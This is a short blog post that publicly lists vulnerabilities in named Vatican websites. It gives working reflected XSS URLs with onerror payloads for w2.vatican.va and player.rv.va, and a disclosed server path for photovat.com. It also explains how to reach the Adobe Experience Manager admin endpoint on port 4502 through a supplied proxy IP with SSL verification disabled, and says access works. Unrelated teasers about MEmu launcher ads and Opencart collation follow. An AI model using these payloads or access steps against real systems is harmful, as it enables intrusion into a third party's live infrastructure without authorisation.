Skip to main content

w2.vatican.va photovat.com | XSS, path disclosure


Simple XSS
http://w2.vatican.va/content/francesco/it/events/event.dir.html/content/vaticanevents/it/2017/4/229%3Cimg%20src=%22a%22%20onerror=%22alert('xss')%22%3E

_____________________________________
Adobe experience manager CMS
A proxy is needed to connect since probably they limited the access from a range of IPs
-> Sample working proxy: 5.152.158.4:8080
Admin access: https://w2.vatican.va:4502/admin

SSL verification must be disabled (OCSP on firefox).

Update: it's possible to access
_____________________________________

Other websites
http://player.rv.va/rv.player01.asp?language=it&AudioLanguage=ita&visual=Tv&nocontrols=tr%27ue&fullframe=true&width=640&height=360%22%3E%3Cimg%20src=a%20onerror=alert(%221%22)%3E%3C%22&autoplay=true

_____________________________________
 http://www.photovat.com
IIS server
D:\inetpub\webs\photovatcom

Comments

Post a Comment

Popular posts from this blog

2022 - Remove (the too many) Ads from Memu launcher

Simple method Download from pureapk "MEmu Launcher2" ex: MEmu Launcher2_v6.0.9_apkpure.com Install "System app remover" (root) remove from system apps the "memu launcher 2" import the "purified" MEmu Launcher2 apk with the Memu utility ("apk" on the right toolbar) Longer method Install "Export Apk" Export the memu launcher2  Install purify https://github.com/echo-devim/purify/raw/master/Purify.apk use purify with the exported memu launcher 2 Install "System app remover" (root) remove from system apps the "memu launcher 2" import the "purified" MEmu Launcher2 apk with the Memu utility ("apk" on the right toolbar)      
Post a Comment
Read more

Database Collation when installing Opencart 3.x, 4.x

  To avoid several problems the database collation for opencart should be as follows: - for Opencart 4.0.1.1 and above it should be " utf8mb4_general_ci " - for Opencart 1.5.51 (Opencart  2.x, Opencart 3.x ) up to Opencart 4.0.1.0 the collation should be " utf8_general_ci " - for Opencart 1.4.1 up to Opencart 1.5.4.1 the collation should be " utf8_bin " - for Opencart <1.1.1 up to Opencart 1.4.0 the collation should be " utf8_unicode_ci " If you are using the latest version of mysql always use " utf8mb4_general_ci ". Never use UTF8mb3*
Post a Comment
Read more